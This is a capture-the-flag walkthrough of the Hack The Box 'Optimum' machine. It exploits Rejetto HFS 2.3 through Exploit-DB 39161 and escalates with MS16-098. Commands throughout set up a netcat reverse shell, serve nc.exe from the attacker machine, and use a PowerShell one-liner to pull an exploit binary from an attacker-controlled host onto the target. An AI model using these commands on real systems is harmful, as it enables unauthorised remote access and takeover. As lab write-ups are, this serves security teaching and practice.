Hack The Box — Optimum Writeup
Hack The Box — Optimum Writeup

Let’s get started!:)

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND:nmap -sC -sV -O -oA optium 10.10.10.8

  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS{Operating System}
  • -oA: output all formats and store in file optium

We got the following result and showing as only one port is open.

  • Port 80: running HttpFileServer httpd 2.3.

Let’s try to find out more open ports in the machine.

Let’s run a nmap scan to find out all ports in the box.

COMMAND: nmap -sC -sV -O -p- -oA optiumFULL 10.10.10.8

we got the result but no open ports except port 80 are opened.:(

Let’s try to scan udp ports . let’s checkif any udp ports are alive in the machine.

COMMAND: nmap -sU -O -p- -oA optiumUDP 10.10.10.8

We didn’t get any ports open:(

Let’s check the web server running on port 80

Enumeration

Browse to the HTTP File server.

URL: http://10.10.10.8

it seems that this server has an exploit that used to gain complete remote access.

Let’s google to find any exploit.:)

httpfileserver 2.3

The first two google results will help us to gain complete remote access of the machine.

Let’s check the first result in the google and see the instructions for the next step.

In order to go further and compile the exploit we need to do the following things below.

  1. Host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.
  2. Start a netcat listener on the attack machine.
  3. Download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.
  4. Run the script using python as stated in the Usage comment.

Let’s understand the exploit first then we will proceed further.

Everything in yellow (in double quotes) is URL encoded. Let’s decode it using an online encoder/decoder.

URL Decoded Exploit

In the exploit, three functions are called:

  • script_create(): creates a script (script.vbs) that when run downloads the nc.exe from our attack machine and saves it to the C:\Users\Public\ location on the target machine.
  • execute_script(): uses the csscript.exe (command-line version of the Windows Script Host that provides command-line options for setting script properties) to run script.vbs.
  • nc_run(): runs the the netcat executable and sends a reverse shell back to our attack machine.

Now that we understand what the script is doing, what remains to be answered is why was remote code execution allowed. Further googling tells us the reason.

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

This makes sense. In the exploit, every time a search is done to run arbitrary code, the %00 sequence is used.

Gaining an Initial Foothold

Now that we understand the exploit, let’s run it. In the instructions, the first step is to host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.

Locate the Windows netcat executable file in the kali vm.

COMMAND: locate nc.exe

Now let’s copy to the current locate in which we will run a python http server.

Just copy the file to any other folder and run server in the folder.

COMMAND: cp /usr/share/windows-resources/binaries/nc.exe .

dot(.) specifies the current locate to copy the file.

cp nc.exe

Now let’s run the python server .

COMMAND: python -S SimpleHTTPServer

SimpleHTTPServer

If it says No Module found ! then install it using pip.

COMMAND: pip install SimpleHTTPServer

The next step is to start a netcat listener on the attack machine.

COMMAND: nc -nlvp 5555

NETCAT

The next step is to download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.

Let’s search the exploit in the exploit database using searchspoit.

COMMAND: searchsploit 39161

searchsploit

Let’s copy the exploit to our current folder and edit the exploit.

COMMAND: searchsploit -m 39161

Let’s edit the exploit by using nano.

COMMAND: nano 39161.py

Change the values of local ip to your local ip and port as given in netcat listener.

Let’s save and run the exploit.

COMMAND: python 39161.py 10.10.10.8 80

We get a non-privileged shell back!

Let’s get the user flag:)

As this shell is non-privilezed one we need to use privilege escalation techniques in order to gain Admnistrator access and also the root flag:)

Privilege Escalation

We’ll use Windows Exploit Suggester to identify any missing patches on the Windows target machine that could potentially allow us to escalate privileges.

First, download the script.:)

COMMAND: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Now update the xlrd module.

COMMAND: pip install xlrd –upgrade

Now Update the database of the Windows-Exploit-Suggestor.

COMMAND: ./windows-exploit-suggester.py –update

This will creates an excel spreadsheet form the Microsoft vulnerability database in the working directory.

The next step is to retrieve the system information from the target machine. This can be done using the “systeminfo” command.

Now copy the output of the systeminfo and save as sysinfo.txt

Now use the windows-exploiter-suggestor tool to get a possible exploit.

COMMAND: chmod +x windows-exploit-suggester.py

COMMAND: ./windows-exploit-suggester.py –database 2019-10-05-mssb.xls –systeminfo sysinfo.txt

The Windows OS seems to be vulnerable to many exploits! Let’s try MS16–098. In the exploit database, it gives you a link to a precompiled executable. Download the executable on the attack machine.

COMMAND: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now we need to transfer it to the target machine. Start up an HTTP server on attack machine in the same directory that the executable file is in.

COMMAND: python -m SimpleHTTPServer 9005

In target machine download the file in a directory you have write access to.

COMMAND: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.28:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Run the exploit.:)

BOOM! we got the admin access:)

Go to the Desktop folder and get the root.txt flag:)

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

LEAVE A REPLY

Please enter your comment!
Please enter your name here